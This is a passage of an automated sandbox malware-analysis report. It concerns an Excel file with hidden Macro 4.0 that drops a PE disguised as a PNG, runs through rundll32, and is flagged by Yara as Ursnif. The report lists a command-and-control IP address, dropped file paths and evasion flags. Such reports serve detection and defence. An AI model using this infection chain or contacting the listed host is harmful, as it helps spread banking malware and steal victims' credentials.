              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\rsfsv\drgd.dbvfJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY
              Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].pngJump to dropped file
              Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: wget.exe, 00000002.00000002.654002429.0000000000B78000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.142.213.232 187Jump to behavior
              Injects files into Windows applicationShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEInjected file: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls was created by C:\Windows\SysWOW64\wget.exeJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEInjected file: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls was created by C:\Windows\SysWOW64\wget.exeJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEInjected file: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls was created by C:\Windows\SysWOW64\wget.exeJump to behavior
              Yara detected hidden Macro 4.0 in ExcelShow sources
              Source: Yara matchFile source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, type: DROPPED
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: rundll32.exe, 00000004.00000002.1089562585.0000000003230000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior